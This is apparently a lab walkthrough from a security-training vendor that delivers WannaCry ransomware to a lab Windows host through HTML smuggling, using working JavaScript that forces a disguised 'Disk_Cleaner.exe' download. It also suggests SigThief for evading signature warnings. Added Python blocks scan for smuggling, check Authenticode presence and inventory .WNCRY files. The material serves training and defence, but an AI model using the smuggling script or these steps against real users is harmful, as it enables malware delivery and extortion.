Lab Walkthrough - The WannaCry Ransomware
In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!
Introduction
In May 2017, a worldwide ransomware attack infamously known as WannaCry was set in motion. It targeted the Microsoft Windows operating system, encrypting the data on the victim’s machine and demanding a ransom in exchange for a promise to decrypt all the encrypted files and undo the damage; as we discuss further on, that promise is far from the truth. In most cases this ransomware used EternalBlue, an exploit of Microsoft’s implementation of the SMB protocol released by The Shadow Brokers hacker group in April 2017, to gain access to remote Windows machines. It also used the DoublePulsar backdoor to spread itself from the infected machines.
Ransomware damages cost the world an estimated $5 billion (USD) in 2017. The damages for 2018 were predicted to reach $8 billion; for 2019, the figure was $11.5 billion, and in 2021 it was $20 billion.
Similar types of attacks are still active. From 2017 until now, many ransomware families have been created under different names. Even after paying the ransom, there is no guarantee that your data will be decrypted.
Who is a target for ransomware?
According to Josh Fruhlinger's article Ransomware Explained, "there are several different ways attackers choose the organizations they target with ransomware. Sometimes it’s a matter of opportunity: for instance, attackers might target universities because they tend to have smaller security teams and a disparate user base that does a lot of file sharing, making it easier to penetrate their defenses.
On the other hand, some organizations are tempting targets because they seem more likely to pay a ransom quickly. For instance, government agencies or medical facilities often need immediate access to their files. Law firms and other organizations with sensitive data may be willing to pay to keep news of a compromise quiet — and these organizations may be uniquely sensitive to leakware attacks."
Lab Environment
In our lab, we will learn how an attacker can use HTML smuggling to deliver the WannaCry executable to the target user, and how running this executable encrypts the data/files on the target user’s machine and holds that data for ransom.
The user is going to get access to a Kali GUI instance and Windows Server 2019. The Kali machine will play the part of the attacker machine, whereas the Windows machine will be the target user’s machine.
Objective: Deliver the WannaCry executable to the Windows machine using HTML smuggling and execute it to observe the working of WannaCry ransomware!
Tools
The best tools for this lab are:
- Chrome Browser
- Apache Web Server
The wannacry.exe executable is located in: /root/Desktop/tools/ folder.
Solution
Step 1: Open the lab link to access the Kali GUI instance and target machine
Kali GUI
Target Machine
We can notice that the Chrome browser shortcut and the Important Files folder are present on the Desktop.
Step 2: There is a ready-made HTML template available in the /root/Desktop/tools/html-templates folder. We will copy these files to the Apache web server’s root folder.
HTML template source: https://templatemo.com/tm-519-beauty
Note: Remove all existing files from the Apache web server’s root folder before moving the above-mentioned files.
Commands:
rm -rf /var/www/html/*
ls /var/www/html/
Step 3: The WannaCry ransomware executable is present in the /root/Desktop/tools/ folder as wannacry.zip. We need to unzip the archive to access the executable.
Commands:
cd /root/Desktop/tools
unzip wannacry.zip
file wanncry.exe
The WannaCry ransomware attack was the most notorious and highly controversial worldwide cyberattack that happened in May 2017. It targets the Windows operating system by encrypting data and demanding ransom payments in the form of cryptocurrency (Bitcoin).
For more information: https://en.wikipedia.org/wiki/WannaCry_ransomware_attack
We are going to use an HTML template and modify the `index.html` file to deliver the ransomware.
Step 4: Copy the HTML template files to the web server’s root folder.
Commands:
cp -rf /root/Desktop/tools/html-templates/* /var/www/html/
ls /var/www/html/
Modify the index.html file and paste the code below under the HTML <body> tag.
<script>
function base64ToArrayBuffer(base64) {
    // Decode the base64 string into raw bytes held in an ArrayBuffer
    var binary_string = window.atob(base64);
    var len = binary_string.length;
    var bytes = new Uint8Array(len);
    for (var i = 0; i < len; i++) {
        bytes[i] = binary_string.charCodeAt(i);
    }
    return bytes.buffer;
}
// The executable is embedded in the page as a base64 string (filled in at Step 6)
var file = '<backdoor.exe Base64 Encoded Value>';
var data = base64ToArrayBuffer(file);
var blob = new Blob([data], {type: 'octet/stream'});
var fileName = 'Disk_Cleaner.exe';
// A hidden anchor with a download attribute is clicked programmatically,
// so the browser writes the Blob to disk without any user action
var a = document.createElement('a');
document.body.appendChild(a);
a.style = 'display: none';
var url = window.URL.createObjectURL(blob);
a.href = url;
a.download = fileName;
a.click();
window.URL.revokeObjectURL(url);
</script>
HTML smuggling is a well-known phishing campaign technique that uses HTML5 and JavaScript to hide malicious executables or payloads inside a web page. When a target user opens the HTML in their web browser, the browser runs the embedded JavaScript, which decodes the payload and writes it to the machine as a downloaded file. According to Microsoft:
A highly evasive malware delivery technique that leverages legitimate HTML5 and JavaScript features, is increasingly used in email campaigns that deploy banking malware, remote access Trojans (RATs), and other payloads related to targeted attacks. Notably, this technique was observed in a spear-phishing campaign from the threat actor NOBELIUM in May. More recently, we have also seen this technique deliver the banking Trojan Mekotio, as well as AsyncRAT/NJRAT and Trickbot, malware that attackers utilize to gain control of affected devices and deliver ransomware payloads and other threats.
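To show the defender's side of the technique just described, here is an added example (not part of the INE lab or the original post) of a small Python scanner that flags the HTML smuggling pattern in a page: it collects the browser APIs the smuggling script relies on and decodes any large inline base64 literal to see whether it carries a PE (MZ) header. The two HTML samples, the indicator set and the 200-character literal threshold are constructed assumptions for the demo, not values from the lab.

```python
import base64
import re

# Each API below is legitimate and common on its own; it is the combination of
# decode-to-bytes, Blob, object URL, forced download attribute and a synthetic
# click, next to a very large inline literal, that characterises smuggling.
INDICATORS = {
    "atob": re.compile(r"\batob\s*\("),
    "blob": re.compile(r"\bnew\s+Blob\s*\("),
    "object_url": re.compile(r"createObjectURL\s*\("),
    "download_attr": re.compile(r"\.download\s*="),
    "synthetic_click": re.compile(r"\.click\s*\(\s*\)"),
}
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)
# Minimum length of a quoted base64 run worth decoding (assumed threshold,
# tune it for your own estate).
MIN_B64_LITERAL = 200
B64_LITERAL_RE = re.compile(r"""['"]([A-Za-z0-9+/]{%d,}={0,2})['"]""" % MIN_B64_LITERAL)
PE_MAGIC = b"MZ"


def scan_html(html: str) -> dict:
    """Return a verdict, the indicators found and any decoded inline payloads."""
    hits = set()
    payloads = []
    for script in SCRIPT_RE.findall(html):
        for name, pattern in INDICATORS.items():
            if pattern.search(script):
                hits.add(name)
        for literal in B64_LITERAL_RE.findall(script):
            try:
                raw = base64.b64decode(literal, validate=True)
            except ValueError:  # binascii.Error is a ValueError subclass
                continue
            payloads.append({
                "encoded_len": len(literal),
                "decoded_len": len(raw),
                "looks_like_pe": raw[:2] == PE_MAGIC,
            })
    pe_payload = any(p["looks_like_pe"] for p in payloads)
    suspicious = pe_payload or (len(hits) >= 3 and bool(payloads))
    return {
        "verdict": "suspicious" if suspicious else "clean",
        "indicators": sorted(hits),
        "payloads": payloads,
    }


# Constructed fixture: a fake "executable" (MZ header plus zero padding) embedded
# the way the lab page embeds the real one. No actual binary is involved.
SAMPLE_PAYLOAD_B64 = base64.b64encode(b"MZ" + b"\x00" * 300).decode()
SUSPICIOUS_HTML = f"""<html><body>
<script>
var file = '{SAMPLE_PAYLOAD_B64}';
var bytes = Uint8Array.from(atob(file), c => c.charCodeAt(0));
var blob = new Blob([bytes], {{type: 'application/octet-stream'}});
var a = document.createElement('a');
a.href = window.URL.createObjectURL(blob);
a.download = 'Disk_Cleaner.exe';
a.click();
</script></body></html>"""

# Constructed benign page: atob on a short config string, no download at all.
BENIGN_HTML = """<html><body>
<script>
var settings = JSON.parse(atob('eyJ0aGVtZSI6ICJkYXJrIn0='));
document.body.className = settings.theme;
</script></body></html>"""

if __name__ == "__main__":
    for label, page in (("suspicious", SUSPICIOUS_HTML), ("benign", BENIGN_HTML)):
        print(label, scan_html(page))
```

The same check can be run over a mail gateway's HTML attachments or a proxy's page captures; the decoded-size and MZ checks are what separate a real smuggled binary from the many legitimate pages that merely use `atob` or `Blob`.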
Step 5: The web server is all set. Now, we need to copy the base64 encoding of the WannaCry executable (wanncry.exe) to the clipboard using the xsel utility.
Command:
base64 -w0 /root/Desktop/tools/wanncry.exe | xsel --clipboard
Step 6: Paste the base64 encoded value in place of `<backdoor.exe Base64 Encoded Value>`, i.e. as the value of `var file`.
Note: Once we paste the value, it might take up to 1–2 minutes. Please wait patiently.
We have successfully fulfilled all the requirements to create an HTML smuggling webserver to distribute the wannacry.exe executable.
Step 7: Start the Apache web server
Command:
/etc/init.d/apache2 start
Step 8: We need the attacker machine’s IP address to access the malicious web server from the Windows host. Check the IP address with:
Command:
ip addr
The IP Address of the attacker (Kali Machine) is 10.10.15.2
Step 9: Now, switch the view to the Target Machine:
We notice an “Important Files” folder on the Desktop containing two files, INE.jpg and office.pdf.
Step 10: Check both files:
Opening INE.jpg file
Opening office.pdf file
We can access both files without any issue.
Step 11: Open the web browser on the Windows machine and browse to the portal hosted by the attacker.
IP Address: 10.10.15.2
We can notice that the file Disk_Cleaner.exe was downloaded automatically without any action from the user’s side. This confirms that the JavaScript code for HTML smuggling worked and delivered the wanncry.exe malicious executable to the target machine.
The Chrome browser blocked the executable because it is an unsigned executable. It is important to understand that this does not happen because the file is malicious.
There are many tools to bypass this. One such popular tool is SigThief.
Reference: https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf
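The browser and Windows warnings above come from the absence of an Authenticode signature. As an added example that is not from the lab or the original post, the following Python code checks a PE file's headers for the certificate table (data-directory entry 4) that a signed binary carries; it reports presence only and does not verify the signature or its chain, which is exactly the gap a stolen or self-signed certificate would exploit. The two PE header stubs are constructed inside the script and contain no code; the header offsets follow the PE/COFF specification.

```python
import struct

# In the optional header's data directories, entry 4 is the certificate table
# (Authenticode signature). Unlike other entries, its "VirtualAddress" field is
# a raw file offset, not an RVA.
SECURITY_DIR_INDEX = 4
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002


def authenticode_status(pe: bytes) -> dict:
    """Report whether a PE image carries an embedded certificate table.

    Presence only: a populated table means "signed by someone", not
    "signed by someone trustworthy". Chain validation needs a real verifier.
    """
    try:
        if pe[:2] != b"MZ":
            return {"valid_pe": False, "reason": "missing MZ header"}
        (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
        if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            return {"valid_pe": False, "reason": "missing PE signature"}
        coff = e_lfanew + 4
        (size_of_optional,) = struct.unpack_from("<H", pe, coff + 16)
        opt = coff + 20
        (magic,) = struct.unpack_from("<H", pe, opt)
        if magic == 0x10B:        # PE32: directories start at 96, count at 92
            fmt, dirs_off, count_off = "PE32", 96, 92
        elif magic == 0x20B:      # PE32+: directories start at 112, count at 108
            fmt, dirs_off, count_off = "PE32+", 112, 108
        else:
            return {"valid_pe": False, "reason": "unknown optional header magic"}
        (n_dirs,) = struct.unpack_from("<I", pe, opt + count_off)
        entry_off = opt + dirs_off + SECURITY_DIR_INDEX * 8
        if n_dirs <= SECURITY_DIR_INDEX or entry_off + 8 > opt + size_of_optional:
            return {"valid_pe": True, "format": fmt, "has_certificate_table": False,
                    "reason": "no security directory entry"}
        cert_off, cert_size = struct.unpack_from("<II", pe, entry_off)
        result = {
            "valid_pe": True,
            "format": fmt,
            "has_certificate_table": cert_off != 0 and cert_size != 0,
            "cert_offset": cert_off,
            "cert_size": cert_size,
            "table_within_file": cert_off + cert_size <= len(pe),
            "cert_type": None,
        }
        # WIN_CERTIFICATE header: dwLength (4), wRevision (2), wCertificateType (2)
        if result["has_certificate_table"] and result["table_within_file"] and cert_size >= 8:
            _length, _revision, cert_type = struct.unpack_from("<IHH", pe, cert_off)
            result["cert_type"] = cert_type
        return result
    except struct.error:
        return {"valid_pe": False, "reason": "truncated headers"}


def build_sample_pe(signed: bool) -> bytes:
    """Constructed, non-executable PE32+ header stub used only for this demo."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)               # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 240, 0x22)    # x64, 240-byte optional header
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                            # PE32+ magic
    struct.pack_into("<I", opt, 108, 16)                             # NumberOfRvaAndSizes
    image = bytearray(dos + b"PE\0\0" + coff + opt)
    if signed:
        cert_off = 0x200
        # Dummy WIN_CERTIFICATE: 8-byte header plus 8 placeholder bytes (no real PKCS#7 data)
        cert = struct.pack("<IHH", 16, 0x0200, WIN_CERT_TYPE_PKCS_SIGNED_DATA) + b"\0" * 8
        image += b"\0" * (cert_off - len(image)) + cert
        # Security directory entry lives at optional header offset 112 + 4*8 = 144
        struct.pack_into("<II", image, len(dos) + 4 + 20 + 144, cert_off, len(cert))
    return bytes(image)


if __name__ == "__main__":
    print("unsigned:", authenticode_status(build_sample_pe(signed=False)))
    print("signed:  ", authenticode_status(build_sample_pe(signed=True)))
```

Running the check on a real file is just `authenticode_status(open(path, "rb").read())`; an empty entry is what the browser and the Windows "Security Warning" dialog react to, and a non-empty one still has to be validated before it means anything.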
Step 12: Execute the Disk_Cleaner.exe executable.
The file is downloaded in the C:\Users\Administrator\Downloads\ folder.
Again, we have received another Windows “Open File - Security Warning” message. This is also because the executable doesn’t have a valid signature.
We will click on Run:
Once we confirm, wanncry.exe starts encrypting all the files on the system and appends the .WNCRY extension to every encrypted file.
Here is the full list of file extensions that were searched for on the Windows machine and encrypted by the WannaCry ransomware: https://gist.github.com/xpn/facb5692980c14df272b16a4ee6a29d5
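As an added example (not code from the lab or the original post), the following Python script inventories a directory tree for the .WNCRY rename described above, recovers the original file names and extensions from the encrypted copies, and reports which directories are mostly encrypted, which is the kind of sweep an incident responder runs to scope an infection. The sample tree it builds in a temporary directory is constructed to mirror the lab's Important Files folder, and the 50% per-directory threshold is an assumption.

```python
import tempfile
from collections import Counter
from pathlib import Path

WNCRY_SUFFIX = ".WNCRY"
# Fraction of a directory's files that must be encrypted before it is reported
# as affected (assumed threshold).
AFFECTED_RATIO = 0.5


def find_wncry(root) -> dict:
    """Walk a tree and inventory files WannaCry has renamed to *.WNCRY.

    WannaCry appends .WNCRY to the original file name, so the original name and
    extension can be read back from the encrypted copy (INE.jpg.WNCRY -> INE.jpg).
    """
    root = Path(root)
    encrypted = []
    untouched = 0
    per_dir_encrypted = Counter()
    per_dir_total = Counter()
    original_exts = Counter()
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel_dir = str(path.parent.relative_to(root))
        per_dir_total[rel_dir] += 1
        if path.name.upper().endswith(WNCRY_SUFFIX):
            original_name = path.name[:-len(WNCRY_SUFFIX)]
            original_exts[Path(original_name).suffix.lower()] += 1
            per_dir_encrypted[rel_dir] += 1
            encrypted.append(str(path.relative_to(root)))
        else:
            untouched += 1
    affected = sorted(
        d for d, n in per_dir_encrypted.items()
        if n / per_dir_total[d] >= AFFECTED_RATIO
    )
    return {
        "encrypted_count": len(encrypted),
        "untouched_count": untouched,
        "original_extensions": dict(original_exts),
        "affected_dirs": affected,
        "encrypted_files": sorted(encrypted),
    }


def build_sample_tree() -> str:
    """Create a constructed tree resembling the lab Desktop after infection."""
    root = tempfile.mkdtemp(prefix="wncry_demo_")
    important = Path(root, "Important Files")
    important.mkdir()
    # The originals are gone; only the renamed, encrypted copies remain,
    # as the lab observes for INE.jpg and office.pdf.
    (important / "INE.jpg.WNCRY").write_bytes(b"\x00constructed ciphertext\x00")
    (important / "office.pdf.WNCRY").write_bytes(b"\x00constructed ciphertext\x00")
    other = Path(root, "Other")
    other.mkdir()
    (other / "notes.txt").write_text("untouched file")
    return root


if __name__ == "__main__":
    report = find_wncry(build_sample_tree())
    for key, value in report.items():
        print(f"{key}: {value}")
```

Pointing `find_wncry` at a user profile or a file share gives a quick count of what was hit and which extensions the run reached, which is also the list to check against the backup set when restoring.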
As soon as the WannaCry ransomware has encrypted all the files, it shows a ransom message demanding payment in cryptocurrency (Bitcoin).
A countdown is also shown to the user. If the user fails to pay the ransom in time, the attacker will delete the encryption key, and the data will remain encrypted.
A Bitcoin address is shown in the message. If we analyze that Bitcoin address on Blockchair (https://blockchair.com/bitcoin/address/13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94), we can see that people are still making payments to it.
Bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
Try to check the files present in the Important Files folder, i.e. INE.jpg and office.pdf. You won’t be able to open them this time, as they have been encrypted by the ransomware.
How can we prevent such attacks?
We must keep the Windows operating system fully updated and never download or execute suspicious or untrusted executables. Some further important actions could save you from this type of advanced attack:
- Take a backup of all your data
- Install Antivirus Software & Firewalls
- Keep All Systems And Software Updated
References
1. https://en.wikipedia.org/wiki/WannaCry_ransomware_attack
2. https://outflank.nl/blog/2018/08/14/html-smuggling-explained
3. https://www.upguard.com/blog/best-practices-to-prevent-ransomware-attacks
Try HTML Smuggling and executing the Wannacry Ransomware in this lab to understand it! Subscribe or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!